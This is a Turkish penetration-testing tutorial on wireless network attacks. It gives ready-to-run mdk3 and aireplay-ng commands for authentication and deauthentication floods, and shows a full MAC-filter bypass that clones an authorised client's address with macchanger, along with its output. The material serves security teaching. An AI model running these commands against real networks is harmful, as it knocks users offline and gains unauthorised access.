Sızma Testlerinde Kablosuz Ağlar ve Atak Vektörleri – V

Kablosuz Ağlara Yönelik Saldırı Çeşitleri

Kablosuz Ağlara Yönelik DoS Saldırıları

WEP’ten sonra WPA ve WPA2 ile kablosuz ağlarda CCMP kullanılarak güvenlik standartı yükseltilsede,  bu koruma sadece data framelere uygulanabiliyordu. Management frameler ile ilgili bir işlem ise yoktu. Yani management frameler şifresiz ve manipüle edilebilir durumdadır. Management framelerin bu özelliği kablosuz ağları DoS ataklara açık bırakmaktadır.



Gerçek hayatta karşılaşılan birçok Dos atak çeşidi(HTTP Flood, TCP SYN flood, ICMP flood) kablosuz ağlarda da uygulanabilir. Ancak  kablosuz ağlara özel olan DoS saldırılarıda vardır. Bu saldırılar OSI modelinde, iletişimin frame(çerçeve)ler ile sağlandığı  2.katmanında(Data link layer) uygulanır. (Fiziksel katmanda jammerlar ile sinyaller bozularakta iletişim engellenebilir.)

Yapılan saldırılar  authentication/association flood ve deauthentication/disassociation flood şeklindedir.

Bir istemcinin, AP ile bağlantı kurma aşaması kabaca şu şekilde gerçekleşir:
  1. İstemci authentication isteğinde bulunur.
  2. AP authentication cevabı yollar.
  3. İstemci assocation isteğinde bulunur.
  4. AP assocation cevabı yollar.



Association işlemi için authentication şarttır. Bir istemci birden fazla sisteme authentication kurmuş olabilir ancak sadece bir AP ile association kurabilir.



Saldırıyı belli bir kullanıcıya(bilgisayara) yönlendirmek için bu işlemlerden önce airodump-ng, Kısmet gibi araçlarla hedef kablosuz ağa bağlı kullanıcılara keşif çalışması yapılabilir.
(Bu saldırılar iletişimi bir süre kesintiye uğratabilir, AP’yi yeniden başlatmak gerekebilir. )


Authentication atak için;


mdk3 mon0 a -m -i F8:D1:11:40:D2:8E


Deauthentication frame, istemci veya AP tarafından bağlantıyı sonlandırmak amacıyla gönderilir.
Deauthentication atak yapması çok kolaydır. Bunun için mdk3 kullanılmıştır. Broadcast MAC adrese gönderilecek sahte frameler ile kablosuz ağa bağlı tüm istemciler ağdan düşürülebilir. -b ile deauthentication saldırısı yapılacak MAC adreslerinin olduğu dosya okutulur.


mdk3 mon0 d -b mac_adresi_listesi -c 4
aireplay-ng –deauth 20 -a 00:1F:D4:01:6A:C8 -c 00:27:10:5C:08:18 mon0


Association flood:
AP association sağlanmış her istemci için bir tablo tutar. Bu tarz atakta sınırlı belleğe sahip tablonun doldurulması ve yeni istemcilerin bağlananaması amaçlanır. Bunun için sürekli değişen MAC adresleri ile AP’ye association istekleri gönderilir.


IEEE 802.11w ile management frameler şifreli olarak gönderilebilmektedir. Ancak bu standart henüz yaygınlaşmamıştır.


Mac Adres Filtreleme Önlemlerinin Atlatılması

Kablosuz ağ için uygulanabilecek güvenlik önlemlerinden biriside MAC adresi filtrelemesidir. Bir çok switch/modem tarafından desteklenen bu özellikle sadece istenen MAC adreslerinin kablosuz ağa bağlanması sağlanabilir. Ancak bu koruma, ağa bağlı kullanıcılar tespit edilerek atlatılabilir.


1. adım ağa bağlanma yetkisi olan istemcilerin tespiti
2. adım ağa bağlanma yetkisi olan MAC adreslerinin klonlanması
3. adım erişim izni olan MAC adresi ile birlikte ağa bağlanma denemesi


Aşağıdaki gibi hedef kablosuz ağa bağlı kullanıcı bilgileri sniff edilmeye başlanmıştır.


airodump-ng mon0 –bssid 18:28:61:3B:3B:1E -c 3


Ağa bağlı gözüken 4 kullanıcıdan sadece ortada bulunan 2 tanesinin MAC adresleri modem üzerinde tanımlanmıştır. Hedef olarak 00:23:08:E9:B4:DF MAC adresli kullanıcı alınmıştır.


CH  3 ][ Elapsed: 1 min ][ 2014-05-15 19:40 ][ fixed channel mon0: -1                                   
                                                                                                                       
BSSID           PWR RXQ  Beacons #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                       
18:28:61:3B:3B:1E  -35 100   366   355 0   3  54e  WPA2 CCMP   PSK  Korsan                                    
                                                                                                                       
BSSID           STATION         PWR   Rate Lost Frames  Probe                                              
18:28:61:3B:3B:1E  A0:F3:C1:27:BF:E8 0 0 – 1   0     1                                                      
18:28:61:3B:3B:1E  20:C9:D0:BF:7D:F1  -31   54e-54   0   226                                                      
18:28:61:3B:3B:1E  00:23:08:E9:B4:DF  -46   54e-54e 0   129                                                      
18:28:61:3B:3B:1E  28:BA:B5:39:C0:1D  -49 0 – 1   0     4                                                      



Bu ağa bağlanılmak istendiğinde aşağıdaki gibi Access Point: Not-Associated olarak gözükmektedir.



root@kali:~# iwconfig wlan1
wlan1 IEEE 802.11bgn  ESSID:”Korsan”  
      Mode:Managed  Frequency:2.422 GHz  Access Point: Not-Associated   
      Tx-Power=20 dBm   
      Retry  long limit:7   RTS thr:off   Fragment thr:off
      Encryption key:off
      Power Management:off



Atlatmak için MAC adresimizi hedef olarak belirlenen MAC adresi ile değiştiririz. Bunu yapabilmek için kablosuz ağa bağlı arayüz down hale getirilir. MAC adresi değiştirildikten sonra tekrar up yapılır.



root@kali:~# ifconfig wlan1 down
root@kali:~# macchanger -m 00:23:08:E9:B4:DF wlan1
Permanent MAC: a0:f3:c1:27:bf:e8 (unknown)
Current   MAC: a0:f3:c1:27:bf:e8 (unknown)
New    MAC: 00:23:08:e9:b4:df (Arcadyan Technology Corporation)
root@kali:~# ifconfig wlan1  up


Kablosuz ağa tekrar bağlanılmaya çalışıldığında sonuç aşağıdaki gibi başarılıdır.


wlan1 IEEE 802.11bgn  ESSID:”Korsan”  
      Mode:Managed  Frequency:2.422 GHz  Access Point: 18:28:61:3B:3B:1E   
      Bit Rate=54 Mb/s   Tx-Power=20 dBm   
      Retry  long limit:7   RTS thr:off   Fragment thr:off
      Encryption key:off
      Power Management:off
      Link Quality=70/70  Signal level=-36 dBm  
      Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
      Tx excessive retries:0  Invalid misc:232   Missed beacon:0


Bazen ağda aynı MAC adresi 2 defa olduğu için IP alma konusunda sıkıntılar yaşanabilir. Bunun için MAC adresini değiştirmeden önce hedef istemciye özel deauthentication saldırısı yapılıp ağdan düşürülebilir.


root@kali:~# aireplay-ng –deauth 50 -a 18:28:61:3B:3B:1E -c 00:23:08:e9:b4:df mon0


50, gönderilecek deauthentication paketlerinin sayısını
-a, APnin MAC adresini
-c, hedef istemcinin MAC adresini ifade eder.
mon0 ise atağın yapıldığı kablosuz ağ arayüzüdür.